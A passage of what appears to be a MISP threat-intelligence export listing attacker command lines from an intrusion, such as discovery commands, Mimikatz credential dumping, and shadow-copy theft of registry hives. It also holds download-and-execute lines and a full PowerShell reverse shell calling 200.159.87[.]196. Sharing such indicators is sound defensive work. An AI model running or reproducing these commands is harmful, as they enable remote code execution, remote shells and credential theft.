"timestamp" : "1664973034" ,
"uuid" : "4244f8ac-02b4-4e7e-952a-2a5fc074f498" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973034" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "8521314a-ad8b-4d61-ae85-ceb07a685c04" ,
"value" : "cmd.ex\u0435 /c syst\u0435minfo"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973034" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "c272d2d5-bc98-473d-b564-bb6da2a5d0a4" ,
"value" : "Display system profile and installed hotfixes"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973109" ,
"uuid" : "ce69179a-198c-4251-818b-738836cbc598" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973109" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "e0acd75a-6dd7-40ab-b069-672664f1e4b3" ,
"value" : "cmd.ex\u0435 /c ipconfig -displ\u0430ydns"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973109" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "a9f4402e-11f4-41db-9463-046d765d2a70" ,
"value" : "Display DNS resolver cache"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973130" ,
"uuid" : "ce6570c7-2cf4-4b21-9d83-46553a2ffb96" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973130" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "0135e480-afdf-4f34-a86e-16bc666432e5" ,
"value" : "cmd.ex\u0435 /c ipconfig -\u0430ll"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973130" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "87dd9202-d19b-41c5-ba44-13982f05d301" ,
"value" : "Display network configuration on all network interfaces"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973148" ,
"uuid" : "aad0eb86-0f69-43ad-8160-19fd3db38e7c" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973148" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "f3fcfea6-8d3a-4c19-86ab-0d4d6d7d826a" ,
"value" : "cmd.ex\u0435 /c n\u0435t user"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973148" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "0df6194b-000f-4f58-bdc3-5ceb727f28ca" ,
"value" : "Display local users"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973177" ,
"uuid" : "b860e3a1-79ca-42bb-bc9e-8eeb0f6afd78" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973177" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "64f25bb2-a69d-446f-bddf-e2203b0a97cc" ,
"value" : "cmd.ex\u0435 /c n\u0435t user /domain"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973177" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "65748b94-07c0-4c03-9d15-616156d3f224" ,
"value" : "Display domain users"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973197" ,
"uuid" : "ce6c6d09-48d0-4943-8373-e05933066fdd" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973197" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "2a24b94c-a7fb-40d8-a17a-5a81415a3a8f" ,
"value" : "cmd.ex\u0435 /c n\u0435t use"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973197" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "654d92dc-d34c-4d77-9b01-7e40d39a7672" ,
"value" : "Display mapped drives to local system"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973217" ,
"uuid" : "a7185faa-c1ad-404f-baa6-a05ecd72d479" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973217" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "09fa74e0-b6fa-4903-9e83-e26ffb4249d2" ,
"value" : "cmd.ex\u0435 /c op\u0435nfil\u0435s"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973217" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "de58858d-accd-46e3-87de-e1d69d793458" ,
"value" : "Display files opened remotely"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973518" ,
"uuid" : "5a7223b0-b85e-42cb-a17e-648697e05301" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973518" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "f8f8b55c-73f8-4122-bfbb-c2fdf69aa8ba" ,
"value" : "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u201chtt\u0440s://raw.githubusercont\u0435n\r\nt.com/BC-\r\nSECURITY/Empire/master/data/module_source/cr\u0435dentials/Invok\r\ne-Mimikatz.ps1\u201d); Invoke-Mimik\u0430tz -Command\r\nprivil\u0435ge::d\u0435bug; Invoke-Mimik\u0430tz -DumpCr\u0435ds;"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973518" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "6702b1ce-b619-484f-8119-d22e05308b4d" ,
"value" : "Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664973541" ,
"uuid" : "7caec62a-520f-40f8-9d8c-f8b1f9b6a691" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664973541" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "7bc8e341-8834-41f1-adde-38b68eb86eef" ,
"value" : "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u2018htt\u0440s://raw.githubuserconten\r\nt.com/putterp\u0430nda/mimikitt\u0435nz/master/Invoke-\r\nmimikitt\u0435nz.ps1\u2019); Invoke-mimikitt\u0435nz"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664973541" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "e9558c51-38e6-4e2b-9fc5-f533d954eccd" ,
"value" : "Decoded base64 command issued through webshell to invoke Mimikittenz to dump passwords"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664977061" ,
"uuid" : "eaa69f57-9a50-486e-a02b-43e7f5d138ef" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "a655e6f0-f234-436a-b99f-79aacf101289" ,
"value" : "cmd.ex\u0435 /c \u201cregsvr32 /s /n /u /i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct\r\nscrobj.dll 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "76d696f3-df01-486a-8776-13f2d5b54ad1" ,
"value" : "cmd.ex\u0435 /c \u201cpowershell -command \u201cregsvr32 /s /n /u\r\n/i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll\u201d 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "4b0d2208-9149-4766-9caa-95045b220ca1" ,
"value" : "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://200.159.87[.]196/made.ps1\u2019)\r\n; made.ps1\u201d 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "da35c1bc-c67f-40d0-b63a-190133c67e79" ,
"value" : "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -c \u201c(New-Object\r\nSystem.NET.W\u0435bClient).DownloadFile(\u2018htt\u0440://200.159.87[.]196/av.vbs\u2019,\\\u201d$e\r\nnv:temp\\av.vbs\\\u201d);Start-Proc\u0435ss %windir%\\system32\\cscript.ex\u0435\r\n\\\u201d$env:temp\\av.vbs\\\u201d\u201d 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "94f655cc-64ba-4ad7-95fa-ed54a6bfdd3b" ,
"value" : "cmd.exe /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://<internal_IP_address>:8000/\r\nmade.ps1\u2032); made.ps1\u2033 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "8db95f84-39a8-4a39-a0d5-d4cb25bd50fb" ,
"value" : "cmd.exe /c \u201cmsi\u0435xec /q /i http://200.159.87[.]196/1.msi 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "f21d9423-dd4a-4a79-9ca2-e0401e8bd951" ,
"value" : "cmd.exe /c \u201cpowersh\u0435ll -nop -c \u201c$client = New-Object\r\nSystem.Net.Sockets.TCPClient(\u2018200.159.87[.]196\u2019,3306);$str\u0435am =\r\n$client.G\u0435tStream();[byte[]]$bytes = 0..65535|%{0};while(($i =\r\n$stream.R\u0435ad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object \u2013\r\nTypeName System.Text.ASCIIEncoding).G\u0435tString($bytes,0, $i);$sendback =\r\n(iex $data 2>&1 | Out-String );$sendback2 = $sendback + \u2018PS \u2018 +\r\n(pwd).Path + \u2018> \u2018;$s\u0435ndbyte =\r\n([text.encoding]::ASCII).G\u0435tBytes($sendback2);$str\u0435am.Write($sendbyte,0,\r\n$sendbyte.Length);$stream.Flush()};$client.Close()\u201d 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664977061" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "c63a18b8-b87a-44fa-9977-52a17142e963" ,
"value" : "Alternative methods to achieve command execution while bypassing security controls using LOLBINs such as REGSVR32 and MSIEXEC"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664977077" ,
"uuid" : "afb5a5bf-5cd9-45e9-b96d-85cce8e11854" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664977077" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "2f8049e4-4835-4009-b630-8a01c879b92d" ,
"value" : "cmd.exe /c \u201cPowersh\u0435ll.ex\u0435 -NoP -NonI -W Hidden -Ex\u0435c Bypass IEX (New-\r\nObject\r\nNet.WebClient).DownloadString(\u2018htt\u0440s://raw.githubusercontent[.]com/cheet\r\nz/PowerSploit/master/CodeEx\u0435cution/Invoke\u2013Shellcode.ps1\u2019); Invoke-\r\nShellcode -Payload windows/met\u0435rpreter/reverse_https -Lhost\r\n200.159.87[.]196 -Lport 3306 -Force 2>&1"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664977077" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "4d48311c-5474-4628-b36d-f611e8d393d4" ,
"value" : "PowerShell command to invoke a Meterpreter session"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664980128" ,
"uuid" : "58a63b89-307c-4545-95a2-179cb9fd844a" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664980128" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "b8c10241-5dd1-4903-8378-1c8ded56dfef" ,
"value" : "CMD /C vss\u0430dmin create shadow /for=E:"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664980128" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "4df67d32-c7d8-47ba-b629-8e7a88f9289b" ,
"value" : "Create a volume shadow copy to collect SAM and SYSTEM registry hives from local system, or NTDS.DIT and SYSTEM hives if on a domain controller"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664980143" ,
"uuid" : "28a158a4-784a-47ca-a1b6-af05a6f0c7a4" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664980143" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "8ca8c120-d1af-4fa4-9d61-e2bbcb22077b" ,
"value" : "CMD /C vss\u0430dmin list shadows /for=E:>"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664980143" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "32f0180f-9645-4386-bfab-a93e4f7fdfb1" ,
"value" : "Test if the above command worked"
}
]
}
]
}
}